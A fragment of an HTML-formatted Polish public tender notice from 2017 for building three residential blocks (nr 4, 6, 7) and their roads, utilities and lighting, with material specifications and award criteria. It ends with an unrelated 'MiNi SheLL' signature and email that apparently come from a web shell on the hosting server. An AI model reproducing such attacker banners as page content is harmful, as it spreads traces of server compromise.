Wzór umowy, jaka zostanie zawarta (podpisana) z wykonawcą, którego oferta zostanie uznana za najkorzystniejszą, stanowi załącznik nr 2 do SIWZ<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Złożona oferta wraz z załącznikami będzie jawna, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (art. 11 ust. 4 ww. ustawy  tekst jednolity - Dz. U. z 2003 roku Nr 153, poz. 1503 ze zm.) co, do których Wykonawca składający ofertę zastrzegł oraz wykazał, iż zastrzeżone informacje stanowią tajemnice przedsiębiorstwa.<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />W przypadku gdy Wykonawca nie wykaże, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa Zamawiający uzna zastrzeżone informacje za jawne, o czym poinformuje Wykonawcę.
Uwaga!  Informacje stanowiące tajemnicę przedsiębiorstwa, winny być zgrupowane, stanowić oddzielną część oferty oraz być odpowiednio zabezpieczone tj. np. odpowiednio opisane, oddzielone dodatkowymi okładkami z napisem tajemnica przedsiębiorstwa tylko do wglądu przez Zamawiającego lub tym podobne).
Wykonawca, który będzie chciał skorzystać z jawności dokumentacji z postępowania (protokołu) w tym i ofert, musi wystąpić w tej sprawie do Zamawiającego z wnioskiem.
<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta wraz z załącznikami musi być napisana w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Budowa trzech budynków mieszkalnych o numerach projektowych 4, 6 i 7 z przyłączami<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.Charakterystyka budynków
Budynki mieszkalne wielorodzinne, w układzie: budynek nr 4 dwuklatkowy, niepodpiwniczony, trzykondygnacyjny;  budynki nr 6 i 7 jednoklatkowe trzykondygnacyjne.  Na parterze w każdym z budynków przewidziano lokale mieszkalne oraz pomieszczenia techniczne i gospodarcze (komórki lokatorskie, wózki i rowery, suszarnie).
Architektura budynków prosta, określona między innymi eksponowanymi płaszczyznami prostych rozalitów i wykuszy oraz dachu płaskiego. Materiał elewacji to głównie kolorowy tynk akrylowy oraz płytki elewacyjne elastyczne.
Rozwiązania konstrukcyjno-materiałowe dla budynków to: 
ławy żelbetowe, 
ze względu na konieczność ocieplenia fundamentów styropianem XPS gr. 8cm należy stosować hydroizolacyjne preparaty bezrozpuszczalnikowe; izolację poziomą parteru stanowić będzie folia hydroizolacyjna (2x) gr. 1mm; izolację pionową ścian fundamentowych wykonać należy z masy asfaltowo-kauczukowej bezrozpuszczalnikowej, wzmocnionej welonem szklanym z osłoną z płyt polistyrenowych XPS gr. 8 cm; izolację pionowa należy połączyć z poziomą na zakład min. 50 cm,
izolację posadzki w pomieszczeniach sanitarnych (łazienka, wc, kuchnia) wykonać z folii hydroizolacyjnej zbrojonej siatką szklaną (2x) lub powłoki przeciwwilgociowej np. AQUAFIN  2K. 
izolacja balkonów jak wyżej,
ściany nośne z pustaków ceramicznych poryzowanych gr. 25 cm np. porotherm, 
izolacja termiczna ścian zewnętrznych ocieplone styropianem EPS 70  040 FASADA  gr. 15 cm, wieńce, nadproża i rdzenie żelbetowe ocieplone wkładami styropianowymi gr. 15 cm; ościeżyny otworów okiennych i drzwi zewnętrznych ocieplone styropianem EPS70  040  gr. 3 cm; dach  kliny dachowe ze styropianu EPS 100  038, wierzchnia warstwa ze styropianu EPS 200  038   gr. 200  gr. Łączna grubość styropianu (średnio) 45cm
izolacja termiczna podłogi na gruncie  styropian EPS 200  037 DACH/PODŁOGA gr. 12 cm.
stropy żelbetowe monolityczne gr. 18 cm,
płytki ceramiczne w komórkach lokatorskich i klatce schodowej,
płytki elewacyjne elastyczne, paroprzepuszczalne, na kleju dyspersyjnym (na oklejonych powierzchniach nie mogą pojawiać się białe wykwity solne) 
ściany ciągów komunikacyjnych - tynki wewnętrzne gipsowe zatarte na gładko, malowane,
konstrukcja balkonu  w budynku nr 4 dostawiana do budynku (na słupach stalowych płyty żelbetowe prefabrykowane gr. 8-10 cm), w budynkach nr 6 i 7 żelbetowe monolityczne
konstrukcja balkonów dostawiana do budynków (na słupach stalowych płyty żelbetowe prefabrykowane gr. 8-10 cm),
balkony oraz tarasy wykafelkowane oraz otynkowane od spodu,
pokrycie dachowe dwuwarstwowe. Papa podkładowa asfaltowa samoprzylepna modyfikowana elastomerami SBS na osnowie z włókniny poliestrowej np. PLASTER P -180/2000. Papa termozgrzewalna wierzchniego krycia z wysokiej jakości asfaltów modyfikowanych elastomerami SBS na osnowie z włókniny poliestrowej o dużej gramaturze, wysokiej elastyczności i bardzo dużej wytrzymałości na rozerwanie np. Czarna Mamba Max PYE 250 S52H
okna PCV o współczynniku przenikania ciepła U=1,1 W/m2K (dla całego okna),
drzwi zewnętrzne aluminiowe  o współczynniku przenikania ciepła U=1,5 W/m2K (dla całych drzwi),
tynki wewnętrzne gipsowe,
ciepło i ciepła woda dostarczane z lokalnych kotłowni gazowych zlokalizowanych w każdym  budynku,
wewnętrzna instalacja RTV SAT, DVBT i teletechniczna w każdym budynku kompletna instalacja wewnętrzna wraz z rozprowadzeniem po wszystkich lokalach mieszkalnych w budynku, kompletna antena zbiorcza przystosowana do odbioru cyfrowej telewizji naziemnej oraz cyfrowej telewizji satelitarnej  
wewnętrzna instalacja domofonowa,
należy założyć dostarczenie oraz montaż skrzynek na listy przynależnej dla każdego z mieszkań oraz jedną dla potrzeb administracyjnych,
dla każdego budynku należy wykonać drenaż opaskowy
opaski wokół budynków  z płytek chodnikowych
przyłącza wodociągowe z rur polietylenowych (HDPD) o śr. nominalnej 63 mm  - dł. 60m
przyłącza do kanalizacji sanitarnej  z rur PVC o śr. zewn. 160 mm  SDR - 34  -  dł. 58,20 m;  
przyłącza do kanalizacji deszczowej:  z rur PVC o śr. zewn. 160 mm   dł. 77,40 m; z rur PVC o śr. 200  127,10 m

II.Dane techniczno-użytkowe projektowanych budynków.
a)Budynek nr 4 o powierzchni całkowitej netto 826,37 m2, składa się w sumie z 11 mieszkań, w tym czterech 3-pokojowych, sześciu 2-pokojowych  oraz jednego 1-pokojowego, co daje w sumie powierzchnię użytkowa mieszkań 660,91 m2. Kubatura budynku brutto to 3.425,00 m2.
b)Budynek nr 6 o powierzchni całkowitej netto 733,89 m2, składa się w sumie z 10 mieszkań, w tym dziewięciu 2-pokojowych  oraz jednego 1-pokojowego dla osoby niepełnosprawnej, co daje w sumie powierzchnię użytkowa mieszkań 574,79 m2. Kubatura budynku brutto to 2.819,00 m2.
c)Budynek nr 7 o powierzchni całkowitej netto 733,91 m2, składa się w sumie z 10 mieszkań, w tym jednego 3-pokojowego oraz dziewięciu 2-pokojowych, co daje w sumie powierzchnię użytkowa mieszkań 571,58 m2. Kubatura budynku brutto to 2.819,00 m2.

III.Przedmiotem zamówienia podstawowego objęte są następujące elementy stanu wykończeniowego lokali mieszkalnych wewnętrznego i zewnętrznego.
tynki wewnętrzne gipsowe zatarte na gładko,
stolarka okienna PCV, zestaw szybowy jednokomorowy o współczynniku przenikania ciepła U=1,1 W/m2K. W oknach należy zamontować (u producenta lub na budowie) nawiewniki higrosterowane w górnym ramieniu skrzydła okiennego
ściany jednokrotnie malowane 
stolarka drzwiowa wewnętrzna drzwi płytowe okleinowe
drzwi wewnętrzne do mieszkań antywłamaniowe
elewacje z gotowej masy tynkarskiej sylikatowej
posadzki w pomieszczeniach mieszkalnych  panele podłogowe w pokojach; płytki ceramiczne z izolacją w kuchni, łazience i wc; płytki ceramiczne w przedpokoju;
okładziny ścienne  płytki ceramiczne w kuchni, łazience i wc;
montaż wyposażenia łazienki i wc w urządzenia sanitarne - umywalka łazienkowa z półpostumentem na stelażu, umywalka łazienkowa z postumentem na stelażu, miska ustępowa na stelażu, wanna z obudową z PCV.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9, 45211340-4,
                    45330000-9,
                    45331100-7,
                    45310000-3,
                    45320000-6,
                    45421100-5,
                    45430000-0,
                    45410000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 18<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>90</td></tr><tr><td>Okres gwarancji/rękojmi</td><td>5</td></tr><tr><td>Termin wykonania</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Budowa sieci wodociągowych, kanalizacji sanitarnej i deszczowej, oświetlenia terenu w zakresie umożliwiającym funkcjonowanie budynków nr 4, 6, 7  zgodnie z przeznaczeniem oraz budowa parkingu i drogi wewnętrznej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obsługa komunikacyjna projektowanych budynków odbywać się będzie przez projektowaną kontynuację drogi wewnętrznej z wykonanym zjazdem na ul. Żywiecką. Projektowany układ drogowy zapewnia dojazd do wejść do budynków, parkingów z kostki brukowej. Łączna ilość miejsc parkingowych do wykonania to 48, w tym 1 dla osoby niepełnosprawnej.
I.Infrastruktura techniczna
Infrastruktura  drogowa 
drogi z betonowej kostki  brukowej gr. 8 cm  - 1352,16 m2
parkingi z betonowej kostki  brukowej gr. 8 cm  940,48 m2
chodniki z betonowej kostki  brukowej gr. 8 cm  1608,56 m2

Sieci wod-kan
sieć wodociągowa z rur polietylenowych (HDPD) o śr. nominalnej 110 mm  228 m; 2 studnie wodomierzowe z wyposażeniem.
kanalizacja sanitarna z rur PVC śr. zewn. 200 mm  SDR - 34   135,40 m; 9 studni rewizyjnych z kręgów betonowych o śr. 1200 mm
kanalizacja deszczowa z rur PVC o śr. zewn. 200 mm  dł.  248,00 m; kanalizacja z rur PVC 0 śr. 250 mm  dł. 172,30 m; 26 studnie rewizyjnych z kręgów betonowych o śr. 1200 mm; 8 studzienek  kanalizacyjnych  systemowych  o śr. 600 mm.

Oświetlenie terenu
7 słupów oświetleniowych ocynkowanych; oprawy typu OCP-70 PC/II; kabel elektroenergetyczny 1 kV typu 3x4 mm2
               
Zagospodarowanie terenu
wykonanie zieleni zgodnie z projektem zieleni w granicach zakresu
1 obudowa śmietnika; 
6  koszy na śmieci; 
7 ławek (identycznych jak aktualnie istniejące przy sąsiadujących budynkach); 
1 plac zabaw z wyposażeniem <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45230000-8, 45233100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>90</td></tr><tr><td>Okres gwarancji/rękojmi</td><td>5</td></tr><tr><td>Termin wykonania</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com